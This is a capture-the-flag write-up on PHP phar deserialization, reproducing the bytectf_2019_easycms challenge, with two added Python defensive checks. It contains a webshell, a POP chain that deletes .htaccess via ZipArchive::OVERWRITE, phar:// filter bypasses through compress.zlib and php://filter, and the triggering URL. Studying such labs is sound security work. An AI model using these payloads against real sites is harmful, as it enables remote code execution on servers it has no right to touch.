Phar deserialization && reproducing bytectf_2019_easycms

0x01 Reference Links

Most of the content below comes from the reference link, which is listed first out of gratitude:
link

0x02 Principle

A phar is essentially an archive. The permissions, attributes and other information of every archived file are placed in the manifest section. The manifest also stores user-defined meta-data in serialize() format, and that meta-data is the core of the attack method discussed here.
We can build a phar file by hand according to this file structure; PHP ships a built-in Phar class for the related operations.
Note: set the phar.readonly option in php.ini to Off, otherwise the phar file cannot be generated.

<?php
class TestObject {
    public $data;
    // magic methods go here (they run when the phar file is included and its meta-data is deserialized)
}
$phar = new Phar("phar.phar"); // the extension must be .phar
$phar->startBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ?>'); // set the stub; a GIF header in front can bypass image format checks
$o = new TestObject();
$o->data = 'hu3sky';
$phar->setMetadata($o); // store the custom meta-data in the manifest
$phar->addFromString("test.txt", "test"); // add the file to compress
// the signature is computed automatically
$phar->stopBuffering();
?>
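As an added defensive example (not code from the original post), here is a Python upload check that walks the stub and global manifest layout described above, as documented in the PHP manual, and flags a file whose phar meta-data holds a serialize()d object. The sample phar bytes and their meta-data are constructed inline for the demonstration; the archive is left unsigned because the check does not look at signatures.

```python
import re
import struct

STUB_END = b"__HALT_COMPILER();"
# serialize() writes objects as O:<len>:"<class>":<n>:{...} (C: for custom serializers)
SERIALIZED_OBJECT = re.compile(rb'(?:^|[{;])[OC]:\d+:"')

def parse_phar_metadata(data: bytes):
    """Return the global meta-data bytes of a phar (b"" if none), or None if not a phar.
    Manifest layout after the stub (PHP manual): manifest length, file count, API
    version, flags, alias length, alias, meta-data length, meta-data, file entries."""
    pos = data.find(STUB_END)
    if pos < 0:
        return None
    pos += len(STUB_END)
    if data.startswith(b" ?>", pos) or data.startswith(b"?>", pos):  # optional close tag
        pos = data.index(b"?>", pos) + 2
    for nl in (b"\r\n", b"\n"):  # at most one line break follows the close tag
        if data.startswith(nl, pos):
            pos += len(nl)
            break
    if len(data) - pos < 18:
        return None
    _mlen, _nfiles, _api, _flags, alias_len = struct.unpack_from("<IIHII", data, pos)
    pos += 18 + alias_len
    if len(data) - pos < 4:
        return None
    (meta_len,) = struct.unpack_from("<I", data, pos)
    return data[pos + 4:pos + 4 + meta_len]

def has_object_metadata(data: bytes) -> bool:
    """Upload check: True when data is a phar whose meta-data holds a serialized object."""
    meta = parse_phar_metadata(data)
    return meta is not None and SERIALIZED_OBJECT.search(meta) is not None

def build_sample_phar(metadata: bytes) -> bytes:
    """Constructed fixture only: unsigned one-file phar with a GIF header in the stub."""
    stub = b"GIF89a<?php __HALT_COMPILER(); ?>\r\n"
    name = b"test.txt"  # entry: name len, name, size, mtime, csize, crc32, flags, meta len
    entry = struct.pack("<I", len(name)) + name + struct.pack("<6I", 4, 0, 4, 0, 0o666, 0)
    body = struct.pack("<IHII", 1, 0x1100, 0, 0) + struct.pack("<I", len(metadata)) + metadata + entry
    return stub + struct.pack("<I", len(body)) + body + b"test"

if __name__ == "__main__":
    evil = build_sample_phar(b'O:10:"TestObject":1:{s:4:"data";s:6:"hu3sky";}')
    plain = build_sample_phar(b"")
    print(has_object_metadata(evil), has_object_metadata(plain), has_object_metadata(b"GIF89a..."))
```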
The following functions deserialize a phar file when handed one (the list from the reference plus additional functions found), grouped by extension:

  • exif: exif_thumbnail, exif_imagetype
  • gd: imageloadfont, imagecreatefrom***
  • hash: hash_hmac_file, hash_file, hash_update_file, md5_file, sha1_file
  • file / url: get_meta_tags, get_headers
  • standard: getimagesize, getimagesizefromstring, finfo_file / finfo_buffer / mime_content_type
  • zip: ZipArchive::open / ZipArchive::extractTo

$zip = new ZipArchive();
$res = $zip->open('c.zip');     // after compressing the phar, rename the archive to .gif; it can still be extracted
$zip->extractTo('phar://test.phar/test');

LOAD DATA LOCAL INFILE also goes through php_stream_open_wrapper and therefore triggers it. Let's test it:

<?php
class A {
    public $s = '';
    public function __wakeup () {
        system($this->s);
    }
}
$m = mysqli_init();
mysqli_options($m, MYSQLI_OPT_LOCAL_INFILE, true);
$s = mysqli_real_connect($m, 'localhost', 'root', '123456', 'easyweb', 3306);
$p = mysqli_query($m, 'LOAD DATA LOCAL INFILE \'phar://test.phar/test\' INTO TABLE a  LINES TERMINATED BY \'\r\n\'  IGNORE 1 LINES;');

Reconfigure mysqld:

[mysqld]
local-infile=1
secure_file_priv=""
Bypassing a check on the phar:// prefix
0x01
$z = 'compress.bzip2://phar:///home/sx/test.phar/test.txt';
$z = 'compress.zlib://phar:///home/sx/test.phar/test.txt';
@file_get_contents($z);
0x02
@include('php://filter/read=convert.base64-encode/resource=phar://yunying.phar');
mime_content_type('php://filter/read=convert.base64-encode/resource=phar://yunying.phar')
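As an added defensive counterpart (not from the original post), this Python snippet contrasts the naive prefix check that the two bypasses above defeat with a hardened check that normalises URL encoding and refuses phar:// anywhere in the value, including inside a compress.* chain or a php://filter resource. The parameter name and the allowlist of schemes are assumptions.

```python
import re
from urllib.parse import unquote

# Stream-wrapper schemes a file-path parameter (like view.php?filepath=) is allowed to use (assumed).
ALLOWED_SCHEMES = frozenset({"file"})
WRAPPER = re.compile(r"^([a-z][a-z0-9.+-]*)://", re.IGNORECASE)

def normalize_path(value: str) -> str:
    """Undo URL encoding until stable, so %3A// and double-encoded forms are seen as ://."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value

def naive_prefix_check(value: str) -> bool:
    """The kind of check the page bypasses: it only looks at the start of the string."""
    return not value.startswith("phar://")

def classify_filepath(value: str) -> str:
    """Hardened check. Returns 'ok' or the reason the value is rejected.
    phar:// is refused anywhere in the string, which covers compress.zlib://phar://...
    and php://filter/.../resource=phar://... (the 0x01 and 0x02 bypasses above)."""
    v = normalize_path(value)
    if "phar://" in v.lower():
        return "phar wrapper (possibly nested)"
    m = WRAPPER.match(v)
    if m and m.group(1).lower() not in ALLOWED_SCHEMES:
        return "wrapper not allowed: " + m.group(1).lower()
    if v.count("://") > 1:
        return "chained wrappers"
    if ".." in v.split("/"):
        return "path traversal"
    return "ok"

if __name__ == "__main__":
    for p in ("compress.zlib://phar:///home/sx/test.phar/test.txt",
              "php://filter/read=convert.base64-encode/resource=phar://yunying.phar",
              "/var/www/html/sandbox/upload.gif"):
        print(naive_prefix_check(p), classify_filepath(p), p)
```

In PHP itself, where the phar wrapper is not needed, the robust mitigation is stream_wrapper_unregister('phar') rather than string filtering.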

0x03 Reproducing bytectf_2019_easycms

Obtain the source: www.zip

  • index.php is the login page; any account can log in. upload.php is the upload page, but only the admin account may upload files.
  • Visiting upload.php generates a sandbox directory containing a .htaccess file that reads: lolololol, i control all
  • After a file is uploaded, its storage path is returned; "view details" leads to view.php, which echoes the file's MIME type and path.
  • Because the directory's .htaccess has that content written into it, it cannot be parsed, so accessing uploaded files returns a 500.


0x01 Hash length extension attack (hashpump.py)

The object is instantiated from the Admin class; follow the Admin class.

This confirms a hash length extension attack. The specific attack steps are not listed here, a quick search will turn them up.

0x02 Constructing the phar POP chain

We know the upload folder contains a .htaccess, so the PHP webshell we upload cannot be parsed; we need a way to delete the .htaccess.

Trying to upload an image webshell shows that there is a filter.
There are two attack ideas:

  • Use phar deserialization to move the uploaded file to another directory, bypassing the sandbox's .htaccess control.
  • First upload a PHP webshell, then use phar deserialization to delete the .htaccess file.

Because we do not know the directory where temporary files are stored, only the second approach can be used.

In view.php there is a File class; follow the File class. As mentioned above, mime_content_type can trigger phar deserialization.
At the same time we note that the Profile class has the magic method __call, which calls an open function, and admin, username and password are all controllable, so we need to find classes that have an open method (ZipArchive, SessionHandler).
ZipArchive can be exploited:
ZipArchive::open ( string $filename [, int $flags ] ) : mixed
With the OVERWRITE flag, this can directly delete the .htaccess file.
Note that it can also open a non-compressed file such as .htaccess.

We first upload a webshell:

<?php 
$a = "sys"."tem";
eval($_POST["xxx"]);
?>

Then construct the `phar pop` attack chain:
<?php
class File {
    public $filename;
    public $filepath;
    public $checker;
}
class Profile {
    public $username;
    public $password;
    public $admin;
}
$a = new File();
$a->checker = new Profile();
$a->checker->admin = new ZipArchive();
$a->checker->username = "/var/www/html/sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/.htaccess";
$a->checker->password = ZipArchive::OVERWRITE;
$phar = new Phar('phar.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER();?>');
$phar->addFromString('test.txt', 'test');
$phar->setMetadata($a);
$phar->stopBuffering();
?>

Ugh: uploading the phar was filtered, with the prompt `you scares me`. In WinHex I saw a ``, but deleting it may damage the phar structure, so that would not work. Switching to PHP 7.0 to generate the phar let it upload completely and solved the problem. We have to keep up with the times; I beat myself up over this one.

Bypass the WAF's detection with php://filter to trigger the phar:

view.php?filename=9c7f4a2fbf2dd3dfb7051727a644d99f.phar&filepath=php://filter/resource=phar://sandbox/fd40c7f4125a9b9ff1a4e75d293e3080/9c7f4a2fbf2dd3dfb7051727a644d99f.phar

The .htaccess was deleted successfully.

Origin blog.csdn.net/a3320315/article/details/102888500